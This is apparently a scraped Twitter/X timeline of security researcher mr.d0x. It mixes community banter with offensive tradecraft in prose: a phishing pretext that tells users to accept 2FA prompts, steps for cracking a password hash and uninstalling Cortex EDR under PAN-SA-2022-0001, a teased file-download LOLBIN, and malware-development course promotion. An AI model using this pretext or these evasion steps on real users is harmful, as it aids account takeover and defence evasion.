Can confirm this works. Another way is to send an email saying "There's IT work going on you may receive a 2FA prompt, just accept it." Surprisingly it works.
1
8
44
0
11
43
@mrd0x
mr.d0x
2 months
@NinjaParanoid I feel like it's a small part of the community but they're just very loud and always seem to be morally and intellectually superior to everyone else
2
0
43
@mrd0x
mr.d0x
1 year
@mythicalcmd @NUL0x4C This training is far more in-depth. Also it's text-based, not video-based. There's custom code (all commented) and exclusive tools shared on there. Here's an example of one module that covers a custom tool 'HellShell'.
Tweet media one
2
5
42
@mrd0x
mr.d0x
2 years
Thanks to all those contributing and sorry for the delay. => new extensions added. => new APIs added.
1
15
38
@mrd0x
mr.d0x
11 months
Tweet media one
@mrd0x
mr.d0x
11 months
I'll be disclosing a new LOLBIN this week on the @MalDevAcademy Discord channel that can be used for downloading files on the machine. Stay tuned!
2
6
86
0
2
38
@mrd0x
mr.d0x
1 year
One of the tools included in the upcoming malware dev course
@NUL0x4C
NULL
1 year
Another tool for the upcoming Maldev Academy course! This tool is part of the entropy reduction module.
7
61
215
2
4
38
@mrd0x
mr.d0x
2 years
Microsoft took measures to ensure the link breaks if this is done when an email is composed normally. But when sent using the 'Reply' or 'Reply All' functionality that protection mechanism doesn't kick in.
0
2
34
@mrd0x
mr.d0x
2 years
I love @HuskyHacksMK memes 😂😂😂😂😂😂
@HuskyHacksMK
Matt | HuskyHacks
2 years
Tweet media one
0
9
88
0
1
33
@mrd0x
mr.d0x
2 years
PAN-SA-2022-0001 demo. Obtain password hash, crack password, disable tamper protection, and uninstall Cortex.
@Normanize11
Normanize
2 years
@mrd0x Cracking the password from the support file was easy too, Thank you!
2
2
10
0
7
33
@mrd0x
mr.d0x
2 years
Added: Although this can also be used for phishing, it's severely restricted due to the time limit & file type restrictions. I can still add it as a phishing technique if people think it's worth adding. Any comments are welcome.
1
3
31